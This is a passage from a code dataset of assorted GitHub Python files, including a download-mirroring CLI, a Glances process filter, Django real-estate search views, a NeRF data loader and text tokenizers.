post_install)\n\t\t)\n\tprint(f\"Added {url} at {shorten_path(filename)}\")\n\n@mirror.command(aliases=[\"add-ar\", \"adda\"])\n@click.argument(\"url\")\n@click.argument(\"archive_filename\")\n@click.option(\"--filename\", \"-f\", type=Path)\n@click.option(\"--mode\", \"-m\", type=OCTAL_PARAM, default=\"755\", show_default=True)\n@click.option(\n\t\"--post-install\", \"--post\", \"-p\", help=\"arbitary shell script to run after installation\"\n)\ndef add_archive(url: str, archive_filename: str, filename: Path, mode: int, post_install: str):\n\tprint(f\"Adding archive {url}\")\n\ttry:\n\t\tfilename = download_file(url, filename, archive_filename)\n\texcept (ValueError, FileExistsError) as e:\n\t\traise ClickException(str(e)) from e\n\tfilename.chmod(mode)\n\t\n\trun_post_install(filename, post_install)\n\t\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"INSERT INTO mirrors VALUES(?, ?, ?, ?)\",\n\t\t\t(str(filename), url, archive_filename, post_install)\n\t\t)\n\tprint(f\"Added archive {url} at {shorten_path(filename)}\")\n\n@mirror.command(aliases=[\"list\", \"ls\", \"l\"])\ndef list_files():\n\twith conn:\n\t\tprint(\"Mirrors:\")\n\t\tmirrors = cursor.execute(\"SELECT filename, url FROM mirrors\")\n\t\tfound = False\n\t\tfor filename, url in mirrors:\n\t\t\tfound = True\n\t\t\tprint(f\"{shorten_path(filename):30} {url}\")\n\t\tif not found:\n\t\t\tprint(\"None\")\n\n@mirror.command(aliases=[\"update\", \"u\"])\ndef update_files():\n\twith conn:\n\t\tfor filename, url, archive_filename, post_install in cursor.execute(\n\t\t\t\"SELECT filename, url, archive_filename, post_install FROM mirrors\"\n\t\t):\n\t\t\tfilename = Path(filename)\n\t\t\tprint(f\"Updating {shorten_path(filename)} with {url}\")\n\t\t\ttry:\n\t\t\t\tdownload_file(url, filename, archive_filename, exist_ok=True)\n\t\t\texcept (ValueError, FileExistsError, requests.exceptions.HTTPError) as e:\n\t\t\t\traise ClickException(str(e)) from e\n\t\t\t\n\t\t\trun_post_install(filename, post_install)\n\tprint(\"Updated!\")\n\n@mirror.command(aliases=[\"rm\", \"r\"])\n@click.argument(\"filename\")\n@click.option(\"--glob\", \"-g\", is_flag=True)\ndef remove_file(filename: str, glob: bool):\n\tpath = Path(filename).expanduser().resolve() #convert relative path to absolute\n\tprint(f\"Deleting {shorten_path(path)}\")\n\t#error handling\n\tif not path.exists():\n\t\tprint(\"Warning: File doesn't exist in filesystem\")\n\tif not glob and not file_in_db(path):\n\t\traise ClickException(f\"File {shorten_path(path)} not in database\")\n\t#handle db\n\twith conn:\n\t\tif glob:\n\t\t\tconn.execute(\"DELETE FROM mirrors WHERE filename GLOB ?\", (str(path), ))\n\t\telse:\n\t\t\tconn.execute(\"DELETE FROM mirrors WHERE filename = ?\", (str(path), ))\n\tprint(f\"Deleted {shorten_path(path)}\")\n\n@mirror.command()\ndef delete_db():\n\tif click.confirm('Are you sure you want to delete the database?'):\n\t\tshutil.rmtree(SAVE_DIR)\n\t\tDB_PATH.unlink()\n\n@mirror.command(aliases=[\"sqlite\"])\ndef sqlite_shell():\n\tsubprocess.run([\"sqlite3\", DB_PATH], check=False)\n\ndef download_file(\n\turl: str,\n\tfilename: Union[str, Path],\n\tarchive_filename: str = None,\n\texist_ok: bool = False\n) -> Path:\n\tresp = requests.get(url)\n\tresp.raise_for_status()\n\t\n\t#get the filename from the response\n\ttry:\n\t\tresp_filename = SAVE_DIR.joinpath(\"a\").with_name(\n\t\t\tcgi.parse_header(resp.headers[\"Content-Disposition\"])[1][\"filename\"]\n\t\t)\n\texcept KeyError:\n\t\tresp_filename = SAVE_DIR.joinpath(urlparse(url).path.split(\"/\")[-1])\n\t\n\tif filename is None:\n\t\tif archive_filename is not None:\n\t\t\tfilename = SAVE_DIR.joinpath(archive_filename)\n\t\telse:\n\t\t\tfilename = resp_filename\n\telse:\n\t\tfilename = Path(filename)\n\t\n\tfilename = filename.expanduser().resolve() # convert relative paths to absolute paths\n\tif filename == SAVE_DIR:\n\t\traise ValueError(\"Empty filename\")\n\t\n\t#check if file exists in db\n\tif filename.exists() and not exist_ok:\n\t\tif file_in_db(filename):\n\t\t\traise ValueError(f\"File {shorten_path(filename)} already in database\")\n\t\telse:\n\t\t\tprint(f\"Warning: File {shorten_path(filename)} already exists\")\n\tif archive_filename is None:\n\t\twith open(filename, \"wb\") as f:\n\t\t\tf.write(resp.content)\n\telse:\n\t\t# archive handling\n\t\t# uses partition on .name instead of .suffix due to .tar.gz\n\t\twith NamedTemporaryFile(suffix=\".\" + resp_filename.name.partition(\".\")[2]) as f:\n\t\t\twith TemporaryDirectory() as tmp_dir:\n\t\t\t\t#unpack into tmp_dir\n\t\t\t\tf.write(resp.content)\n\t\t\t\tshutil.unpack_archive(f.name, tmp_dir)\n\t\t\t\t#path to copy from\n\t\t\t\told_path = Path(tmp_dir).joinpath(archive_filename)\n\t\t\t\tif old_path.is_file():\n\t\t\t\t\tshutil.copyfile(old_path, filename)\n\t\t\t\telif old_path.is_dir():\n\t\t\t\t\ttry:\n\t\t\t\t\t\tshutil.rmtree(filename)\n\t\t\t\t\texcept FileNotFoundError: #ignore if target directory doesn't exist\n\t\t\t\t\t\tpass\n\t\t\t\t\tshutil.copytree(old_path, filename)\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(f\"File {archive_filename} isn't a file or a directory\")\n\treturn filename\n\ndef run_post_install(filename: Path, post_install: str):\n\tif post_install is not None:\n\t\tos.chdir(filename.parent)\n\t\ttry:\n\t\t\tsubprocess.run(post_install, shell=True, check=True)\n\t\texcept subprocess.CalledProcessError as e:\n\t\t\traise ClickException(str(e)) from e\n\ndef file_in_db(filename: Path) -> bool:\n\t\"\"\"check if file is in the database\"\"\"\n\twith conn:\n\t\tcursor.execute(\"SELECT COUNT(filename) FROM mirrors WHERE filename = ?\", (str(filename), ))\n\t\treturn cursor.fetchone()[0] > 0\n\ndef shorten_path(filename: Union[str, Path]) -> str:\n\t\"\"\"shorten /home/user/ to ~\"\"\"\n\tfilename = Path(filename)\n\ttry:\n\t\treturn \"~/\" + str(filename.relative_to(Path.home()))\n\texcept ValueError:\n\t\treturn str(filename)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"SuperStormer/mirror","sub_path":"mirror/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"7919936882","text":"import re\n\nfrom glances.logger import logger\n\n\nclass GlancesFilter(object):\n\n \"\"\"Allow Glances to filter processes\n\n >>> f = GlancesFilter()\n >>> f.filter = '.*python.*'\n >>> f.filter\n '.*python.*'\n >>> f.key\n None\n >>> f.filter = 'user:nicolargo'\n >>> f.filter\n 'nicolargo'\n >>> f.key\n 'user'\n >>> f.filter = 'username:.*nico.*'\n >>> f.filter\n '.*nico.*'\n >>> f.key\n 'username'\n \"\"\"\n\n def __init__(self):\n # Filter entered by the user (string)\n self._filter_input = None\n # Filter to apply\n self._filter = None\n # Filter regular expression\n self._filter_re = None\n # Dict key where the filter should be applied\n # Default is None: search on command line and process name\n self._filter_key = None\n\n @property\n def filter_input(self):\n \"\"\"Return the filter given by the user (as a sting)\"\"\"\n return self._filter_input\n\n @property\n def filter(self):\n \"\"\"Return the current filter to be applied\"\"\"\n return self._filter\n\n @filter.setter\n def filter(self, value):\n \"\"\"Set the filter (as a sting) and compute the regular expression\n A filter could be one of the following:\n - python > Process name of cmd start with python\n - .*python.* > Process name of cmd contain python\n - username:nicolargo > Process of nicolargo user\n \"\"\"\n self._filter_input = value\n if value is None:\n self._filter = None\n self._filter_key = None\n else:\n new_filter = value.split(':')\n if len(new_filter) == 1:\n self._filter = new_filter[0]\n self._filter_key = None\n else:\n self._filter = new_filter[1]\n self._filter_key = new_filter[0]\n\n self._filter_re = None\n if self.filter is not None:\n logger.info(\"Set filter to {} on key {}\".format(self.filter, self.filter_key))\n # Compute the regular expression\n try:\n self._filter_re = re.compile(self.filter)\n logger.debug(\"Filter regex compilation OK: {}\".format(self.filter))\n except Exception as e:\n logger.error(\"Cannot compile filter regex: {} ({})\".format(self.filter, e))\n self._filter = None\n self._filter_re = None\n self._filter_key = None\n\n @property\n def filter_re(self):\n \"\"\"Return the filter regular expression\"\"\"\n return self._filter_re\n\n @property\n def filter_key(self):\n \"\"\"key where the filter should be applied\"\"\"\n return self._filter_key\n\n def is_filtered(self, process):\n \"\"\"Return True if the process item match the current filter\n The proces item is a dict.\n \"\"\"\n if self.filter is None:\n # No filter => Not filtered\n return False\n\n if self.filter_key is None:\n # Apply filter on command line and process name\n return self._is_process_filtered(process, key='cmdline') and self._is_process_filtered(process, key='name')\n else:\n # Apply filter on \n return self._is_process_filtered(process)\n\n def _is_process_filtered(self, process, key=None):\n \"\"\"Return True if the process[key] should be filtered according to the current filter\"\"\"\n if key is None:\n key = self.filter_key\n try:\n # If the item process[key] is a list, convert it to a string\n # in order to match it with the current regular expression\n if isinstance(process[key], list):\n value = ' '.join(process[key])\n else:\n value = process[key]\n except KeyError:\n # If the key did not exist\n return False\n try:\n return self._filter_re.match(value) is None\n except AttributeError:\n # Filter processes crashs with a bad regular expression pattern (issue #665)\n return False\n","repo_name":"santazhang/sandbox","sub_path":"glances_all/Glances-2.11.1/glances/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"441548429","text":"import tensorflow as tf\nimport random\nimport os\nfrom os import scandir\nimport cv2\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_string('train_input_dir', 'data/train',\n 'train input directory, default: data/train')\n\ntf.flags.DEFINE_string('output_dir', 'data/tfrecords/train.tfrecords',\n 'output directory, default: data/tfrecords/train.tfrecords')\n\n\ndef data_reader(train_input_dir, shuffle):\n \"\"\"Read images from input_dir then shuffle them\n Args:\n train_input_dir: string, path of input train dir, e.g., /path/to/dir\n Returns:\n file_paths: list of strings\n \"\"\"\n train_file_paths = []\n train_image_ids = []\n train_image_widths = []\n train_image_heights = []\n\n for img_file in scandir(train_input_dir):\n if img_file.name.endswith('.jpg') and img_file.is_file():\n train_file_paths.append(img_file.path)\n train_image_ids.append(img_file.name[:-4])\n img = cv2.imread(img_file.path, cv2.IMREAD_COLOR)\n height, width, _ = img.shape\n train_image_heights.append(height)\n train_image_widths.append(width)\n\n if shuffle is True:\n # Shuffle the ordering of all image files in order to guarantee\n # random ordering of the images with respect to label in the\n # saved TFRecord files. Make the randomization repeatable.\n shuffled_index = list(range(len(train_file_paths)))\n random.seed(12345)\n random.shuffle(shuffled_index)\n\n train_file_paths = [train_file_paths[i] for i in shuffled_index]\n train_image_ids = [train_image_ids[i] for i in shuffled_index]\n train_image_heights = [train_image_heights[i] for i in shuffled_index]\n train_image_widths = [train_image_widths[i] for i in shuffled_index]\n\n return train_file_paths, train_image_ids, train_image_heights, train_image_widths\n\n\ndef _int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _strs_feature(value):\n \"\"\"Wrapper for inserting strs features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _convert_to_example(train_data, train_id, train_height, train_width):\n \"\"\"Build an Example proto for an example.\n Args:\n train_data: string, path to an image file, e.g., '/path/to/example.JPG'\n Returns:\n Example proto\n \"\"\"\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/train': _bytes_feature(train_data),\n 'image_id/train': _strs_feature(train_id),\n 'image_height/train': _int64_feature(train_height),\n 'image_width/train': _int64_feature(train_width)\n }))\n return example\n\n\ndef data_writer(train_input_dir, output_file):\n \"\"\"Write data to tfrecords\n \"\"\"\n train_file_paths, train_image_ids, train_image_heights, train_image_widths = data_reader(train_input_dir, True)\n\n # create tfrecords dir if not exists\n output_dir = os.path.dirname(output_file)\n try:\n os.makedirs(output_dir)\n except os.error:\n pass\n\n images_num = len(train_file_paths)\n\n # dump to tfrecords file\n writer = tf.python_io.TFRecordWriter(output_file)\n\n for i in range(images_num):\n train_file_path = train_file_paths[i]\n train_image_id = train_image_ids[i]\n train_image_height = train_image_heights[i]\n train_image_width = train_image_widths[i]\n train_image_id = bytes(train_image_id, 'utf-8')\n\n with tf.gfile.FastGFile(train_file_path, 'rb') as f:\n train_data = f.read()\n\n example = _convert_to_example(train_data, train_image_id, train_image_height, train_image_width)\n writer.write(example.SerializeToString())\n\n if (i + 1) % 1000 == 0:\n print(\"Processed {}/{}.\".format(i + 1, images_num))\n print(\"Done.\")\n writer.close()\n\n\ndef main(unused_argv):\n print(\"Convert train and label to tfrecords...\")\n data_writer(FLAGS.train_input_dir, FLAGS.output_dir)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"HEIDIES/MultiPoseNet-tensorflow","sub_path":"build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"45"} +{"seq_id":"9569676068","text":"# def FactorialSeries(N):\n# if N == 0: return 1\n# resultСalc = N * FactorialSeries(N - 1)\n# print(resultСalc, end = \" \")\n# return resultСalc\n\nimport math\n\nuserInput = int(input(\"Введите число: \"))\nres = [i for i in range (1, userInput+1)]\nres = list(map(lambda temp: math.factorial(temp), res))\n\nprint (res)","repo_name":"ImBeavis/Homework_python","sub_path":"Seminar_6/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5836515586","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, RetrieveAPIView \nfrom rest_framework import permissions\nfrom .models import Listestates\nfrom .serializers import ListestatesSerializer, listestatesDetailSerializer\nfrom datetime import datetime, timezone, timedelta\n# Create your views here.\n\nclass ListestatesView(ListAPIView):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n permissions_classes=(permissions.AllowAny, )\n serializer_class = ListestatesSerializer\n lookup_field = 'slug'\n\nclass ListestateView(RetrieveAPIView):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n serializer_class = listestatesDetailSerializer\n lookup_field = 'slug'\n\nclass SearchView(APIView):\n permission_classes = (permissions.AllowAny, )\n serializer_class = ListestatesSerializer\n\n def post(self, request, format=None):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n data= self.request.data\n print(queryset)\n sale_type = data['sale_type']\n queryset = queryset.filter(sale_type__iexact=sale_type)\n price = data['price']\n # price=[''.join(re.findall('[0-9]+',i)) for i in price]\n if price == '$0+':\n price = 0\n elif price == '$200,000+':\n price = 200000\n elif price == '$400,000+':\n price = 400000\n elif price == '$600,000+':\n price = 600000\n elif price == '$800,000+':\n price = 800000\n elif price == '$1,000,000+':\n price = 1000000\n elif price == '$1,200,000+':\n price = 1200000\n elif price == '$1,500,000+':\n price = 1500000\n elif price == 'Any':\n price = -1\n\n if price != -1:\n queryset = queryset.filter(price__gte=price)\n\n bedrooms = data['bedrooms']\n # bedrooms=[''.join(re.findall('[0-9]+',i)) for i in bedrooms]\n if bedrooms == '0+':\n bedrooms = 0\n elif bedrooms == '1+':\n bedrooms = 1\n elif bedrooms == '2+':\n bedrooms = 2\n elif bedrooms == '3+':\n bedrooms = 3\n elif bedrooms == '4+':\n bedrooms = 4\n elif bedrooms == '5+':\n bedrooms = 5\n\n queryset = queryset.filter(bedrooms__gte=bedrooms)\n\n home_type = data ['home_type']\n queryset = queryset.filter(home_type__iexact=home_type)\n\n # bathrooms = data['bathrooms']\n # # bathrooms=[''.join(re.findall('[0-9]+',i)) for i in bathrooms]\n # if bathrooms == '0+':\n # bathrooms = 0.0\n # elif bathrooms == '1+':\n # bathrooms = 1.0\n # elif bathrooms == '2+':\n # bathrooms = 2.0\n # elif bathrooms == '3+':\n # bathrooms = 3.0\n # elif bathrooms == '4+':\n # bathrooms = 4.0\n\n # queryset = queryset.filter(bathrooms__gte=bathrooms)\n\n sqft = data['sqft']\n # sqft=[''.join(re.findall('[0-9]+',i)) for i in sqft]\n if sqft == '1000+':\n sqft = 1000\n elif sqft == '1200+':\n sqft = 1200\n elif sqft == '1500+':\n sqft = 1500\n elif sqft == '2000+':\n sqft = 2000\n elif sqft == 'Any':\n sqft = 0\n\n if sqft != 0:\n queryset = queryset.filter(sqft__gte=sqft)\n\n # days_passed = data['days_passed']\n # # days_passed=[''.join(re.findall('[0-9]+',i)) for i in days_passed]\n # if days_passed == '1 or less':\n # days_passed = 1\n # elif days_passed == '2 or less':\n # days_passed = 2\n # elif days_passed == '5 or less':\n # days_passed = 5\n # elif days_passed == '10 or less':\n # days_passed = 10\n # elif days_passed == '20 or less':\n # days_passed = 20\n # elif days_passed == 'Any':\n # days_passed = 0\n \n\n # for query in queryset:\n # num_days = (datetime.now(timezone.utc)- query.list_date).days\n\n # if days_passed !=0:\n # if num_days > days_passed:\n # slug = query.slugqueryset = queryset.exclude(slug__iexact=slug)\n\n #has_photos= data['has_photos']\n # has_photos=[''.join(re.findall('[0-9]+',i)) for i in has_photos]\n\n # def pic(i):\n # if 'i.photo_'+i:\n # count += 1\n # if has_photos == '1+':\n # has_photos = 1\n # elif has_photos == '3+':\n # has_photos = 3\n # elif has_photos == '5+':\n # has_photos = 5\n # elif has_photos == '10+':\n # has_photos = 10\n # elif has_photos == '15+':\n # has_photos = 15\n \n for query in queryset:\n count = 0\n if query.photo_1:\n count += 1\n if query.photo_2:\n count += 1\n if query.photo_3:\n count += 1\n if query.photo_4:\n count += 1\n if query.photo_5:\n count += 1\n if query.photo_6:\n count += 1\n if query.photo_7:\n count += 1\n if query.photo_9:\n count += 1\n if query.photo_10:\n count += 1\n if query.photo_11:\n count += 1\n if query.photo_12:\n count += 1\n if query.photo_13:\n count += 1\n if query.photo_14:\n count += 1\n if query.photo_15:\n count += 1\n \n \n # for query in queryset:\n # count = 0\n # pic(query) \n # if count < has_photos:\n # slug = query.slug\n # queryset = queryset.exclude(slug__iexact=slug)\n\n # open_house = data['open_house']\n # queryset = queryset.filter(open_house__iexact=open_house)\n\n # keywords = data['keywords']\n # queryset = queryset.filter(description_icontains=keywords)\n\n serializer = ListestatesSerializer(queryset, many = True)\n\n return Response(serializer.data)\n","repo_name":"statst/realestate-backend","sub_path":"listestates/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41760779707","text":"from torch.utils.data import Dataset,DataLoader\nimport os\nimport natsort\nimport json\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\nclass MyDataset(Dataset): #return img,K,tfs\n def __init__(self,root_dir,half_res=True,is_train=True):\n super().__init__()\n self.root_dir=root_dir\n self.half_res=half_res\n self.is_train=is_train\n self.main_dir=self.root_dir+('train/' if is_train else 'test/')\n img_names=list(filter(lambda x:x.endswith('png'),os.listdir(self.main_dir)))\n self.imgs=natsort.natsorted(img_names)\n self.cam_fov,self.tfs=self._camparamGet()\n if self.half_res:\n self.transform=transforms.Compose([transforms.Resize((400,400)),transforms.ToTensor()])\n else:\n self.transform=transforms.Compose([transforms.ToTensor()])\n\n @staticmethod\n def jsonRead(path:str):\n with open(path,'r') as file:\n items=json.load(file)\n cam_fov=torch.tensor(items[\"camera_angle_x\"])\n print('Camera fov: %lf'%(cam_fov))\n tf_np=np.stack([frame[\"transform_matrix\"] for frame in items[\"frames\"]],axis=0)\n tfs=torch.from_numpy(tf_np).float()\n return cam_fov,tfs\n\n def _camparamGet(self):\n json_file=\"%stransforms_%s.json\"%(self.root_dir,\"train\" if self.is_train else \"test\")\n cam_fov,tfs=MyDataset.jsonRead(json_file)\n return cam_fov,tfs\n\n def cameraGet(self):\n return self.cam_fov,self.tfs\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, index):\n img_file=os.path.join(self.main_dir,self.imgs[index])\n image=Image.open(img_file).convert('RGB')\n img=self.transform(image)\n return img,self.tfs[index]\n\n def datasetGet(self):\n result=[]\n for im in self.imgs:\n img_name=os.path.join(self.main_dir,im)\n result.append(self.transform(Image.open(img_name).convert('RGB')))\n all_images=torch.stack(result,dim=0)\n return self.cam_fov,self.tfs,all_images\n\nif __name__==\"__main__\":\n dataset=MyDataset('./lego/',half_res=True,is_train=True)\n print(type(dataset))\n trainloader=DataLoader(dataset,batch_size=8,shuffle=True,num_workers=4)\n for i,(img,tfs) in enumerate(trainloader):\n for i in range(3):\n plt.subplot(1,3,i+1)\n pic_name='picture/'+str(i)+'.png'\n plt.savefig(pic_name)\n plt.imshow(img[i].permute(1,2,0))\n \n print(img.size())\n print(tfs.size())\n break\n plt.show()\n\n\n","repo_name":"sleep2hours/NerF","sub_path":"lego_loder.py","file_name":"lego_loder.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"38817981577","text":"from rest_framework import routers\n\nfrom subscription.views import ArtistSubscriptionViewSet, ChannelSubscriptionViewSet\n\napp_name = \"subscription\"\n\nrouter = routers.DefaultRouter()\nrouter.register(\n \"artist-subscription\", ArtistSubscriptionViewSet, basename=\"artist-subscription\"\n)\nrouter.register(\n \"channel-subscription\", ChannelSubscriptionViewSet, basename=\"channel-subscription\"\n)\n\nurlpatterns = router.urls\n","repo_name":"TywinEvergreen/feeder","sub_path":"subscription/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"16127882619","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, cast\n\nfrom mesa import Agent\n\nfrom bonding_curve_simulator.globals import BaseModel\nfrom bonding_curve_simulator.market.exchange.types import WealthConfig\nfrom bonding_curve_simulator.market.growth_curves import (\n CurveConfig,\n curve_type_function,\n)\n\nif TYPE_CHECKING:\n from bonding_curve_simulator.mesa.simulation_model import SimulationModel\n\n\nclass CreatorAgentConfig(BaseModel):\n wealth_config: WealthConfig = WealthConfig()\n curve_config: CurveConfig = CurveConfig()\n\n\nclass CreatorAgent(Agent):\n def __init__(\n self,\n unique_id,\n model,\n config: CreatorAgentConfig,\n ):\n super().__init__(unique_id, model)\n self.reserve = config.wealth_config.reserve\n self.supply = config.wealth_config.supply\n self.growth_curve = curve_type_function[config.curve_config.curve_type](\n config.curve_config.curve_params\n )\n\n def step(self):\n if TYPE_CHECKING:\n model = cast(SimulationModel, self.model)\n else:\n model = self.model\n\n steps = model.schedule.steps\n\n if steps % 30 == 0:\n self.reserve += self.growth_curve(steps)\n model.exchange.buy(self, self.reserve)\n","repo_name":"stonkify/bonding-curve-simulator","sub_path":"bonding_curve_simulator/mesa/agent/creator.py","file_name":"creator.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11428853575","text":"'''\r\nBoJ 15650 Silver 3 Backtracking\r\nN과 M(2)\r\n'''\r\nimport sys\r\n\r\n\r\ndef solve(A, x):\r\n if len(A) == M:\r\n print(' '.join(map(str, A)))\r\n return\r\n\r\n for i in range(x, N):\r\n if num[i] not in A:\r\n A.append(num[i])\r\n solve(A, i)\r\n A.pop()\r\n\r\n\r\nN, M = map(int, sys.stdin.readline().rstrip().split())\r\nnum = [i for i in range(1, N+1)]\r\n\r\nfor i in num:\r\n answer = [i]\r\n solve(answer, i)\r\n","repo_name":"seungmin8606/Algorithm","sub_path":"Backtracking/boj15650.py","file_name":"boj15650.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"27195737040","text":"import tiktoken\n\n\nclass SimpleTokenizer:\n \"\"\"Tokenizes text by character\"\"\"\n CHAR = \"char\"\n WORD = \"word\"\n\n def __init__(self, tokenizer_type, *, vocab=None, text=None):\n self.tokenizer_type = tokenizer_type\n self.vocab = vocab or self._parse_vocab(text)\n self.n_vocab = len(self.vocab)\n self.ch_to_token = {ch: i for i, ch in enumerate(self.vocab)}\n self.token_to_ch = {i: ch for i, ch in enumerate(self.vocab)}\n\n def encode(self, string):\n try:\n return [self.ch_to_token[c] for c in string]\n except KeyError as e:\n raise TokenizerException(f\"Unable to encode string, unknown character: {e}\")\n\n def decode(self, tokens):\n try:\n return \"\".join([self.token_to_ch[token] for token in tokens])\n except KeyError as e:\n raise TokenizerException(f\"Unable to decode tokens, unknown character for {e}\")\n\n def _parse_vocab(self, text):\n if text is None:\n raise Exception(\"No text available to generate tokenizer\")\n\n if self.tokenizer_type == SimpleTokenizer.CHAR:\n vocab_set = set(text)\n elif self.tokenizer_type == SimpleTokenizer.WORD:\n special = \"\\n !$&',-.3:;?\"\n vocab_set = set()\n for line in text.split(\"\\n\"):\n for word in line.split(\" \"):\n for char in special:\n word = word.replace(char, \"\")\n vocab_set.add(word)\n for char in special:\n vocab_set.add(char)\n\n return sorted(list(vocab_set))\n\n\nclass CharTokenizer(SimpleTokenizer):\n def __init__(self, *, vocab=None, text=None):\n super().__init__(SimpleTokenizer.CHAR, vocab=vocab, text=text)\n\n\nclass WordTokenizer(SimpleTokenizer):\n def __init__(self, *, vocab=None, text=None):\n self.vocab = vocab or self._parse_vocab(text)\n print(\" \".join(self.vocab))\n self.n_vocab = len(self.vocab)\n print(self.n_vocab)\n self.ch_to_token = {ch: i for i, ch in enumerate(self.vocab)}\n self.token_to_ch = {i: ch for i, ch in enumerate(self.vocab)}\n\n def encode(self, string):\n try:\n return [self.ch_to_token[c] for c in self.gen_word(string)]\n except KeyError as e:\n raise TokenizerException(f\"Unable to encode string, unknown character: {e}\")\n\n def decode(self, tokens):\n try:\n return \"\".join([self.token_to_ch[token] for token in tokens])\n except KeyError as e:\n raise TokenizerException(f\"Unable to decode tokens, unknown character for {e}\")\n\n def gen_word(self, text):\n special = [ch for ch in \"\\n !$&',-.3:;?\"]\n for line in text.split(\"\\n\"):\n for word in line.split(\" \"):\n punct = []\n while len(word) > 1 and word[-1] in special:\n punct = [word[-1], *punct]\n word = word[0:-1]\n yield word\n for p in punct:\n yield p\n yield \" \"\n yield \"\\n\"\n\n def _parse_vocab(self, text):\n if text is None:\n raise Exception(\"No text available to generate tokenizer\")\n vocab_set = {word for word in self.gen_word(text)}\n return sorted(list(vocab_set))\n\n\nclass TikTokenTokenizer:\n def __init__(self, encoding=\"r50k_base\"):\n self.encoding = tiktoken.get_encoding(encoding)\n self.n_vocab = self.encoding.n_vocab\n\n def encode(self, string):\n return self.encoding.encode(string)\n\n def decode(self, tokens):\n return self.encoding.decode(tokens)\n\n\nclass TokenizerException(Exception):\n pass\n","repo_name":"ChadBowman/ChadGPT","sub_path":"transformer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72436851335","text":"import math\n\ndef sqrt1(a, x):\n\tepsilon = 0.0001\n\ty = (x + a/x) / 2\n\tif abs(x - y) < epsilon:\n\t\treturn y\n\treturn sqrt1(a, y)\n\nprint(sqrt1(5, 2))\nprint(math.sqrt(4))\nprint(sum([1,2]))\n\ndef my_fun(k):\n\treturn ( math.factorial(4*k) * (1103 + 26390*k) ) / ( (math.factorial(k) ** 4) * (396 ** (4*k) ) )\ndef my_pi(k):\n\ta = (2 * math.sqrt(2)) / 9801\n\ts = sum([my_fun(x) for x in range(k)])\n\treturn 1 / (a * s)\n\nprint(math.pi)\nprint(my_pi(11))\n\ns = 'spam'\nt = list(s)\nprint(t)\n\nverb = dict()\nverb['cat'] = '555'\n\n\ndef hist(s):\n\td = dict()\n\tfor c in s:\n\t\tif c not in d:\n\t\t\td[c] = 1\n\t\telse:\n\t\t\td[c] = d[c] + 1\n\treturn d\n\nprint(hist('brontosaurus'))\n\ndef invert_dict(d):\n\tinverse = dict()\n\tfor key in d:\n\t\tval = d[key]\n\t\tif val not in inverse:\n\t\t\tinverse[val] = [key]\n\t\telse:\n\t\t\tinverse[val].append(key)\n\treturn inverse\n\nprint(invert_dict(hist('brontosaurus')))","repo_name":"chavp/MyPython","sub_path":"ThinkPython/Iteration.py","file_name":"Iteration.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18005093886","text":"from imposm.parser import OSMParser\nimport json\n\n\n# simple class that handles the parsed OSM data.\nclass OSMCounter(object):\n relationDic = {} #{osmid:(tag, refs)}\n coordDic = {} #{osmid:(lat, lon)}\n nodeDic = {} #{osmid:(tag, coordinary)}\n wayDic = {} #{osmid:(tag, refs)}\n crossing_count = 0\n\n # osmid : do write the way's osmid to the result file ?\n # tag : do write the tag to the result ?\n # refs_index: select the index of refs you want\n # coordinate: write the coordinate of the refs to result file or only the refs ?\n def prepare_classify_data(self, input, output):\n\n for line in input.readlines():\n line = line.strip()\n osmid_vector = line.split(' ')\n osmid, node_vec = osmid_vector[0], osmid_vector[1:]\n if len(node_vec) < 10:\n output.write(line.strip() + '\\n')\n continue\n if osmid in self.nodeDic.keys():\n 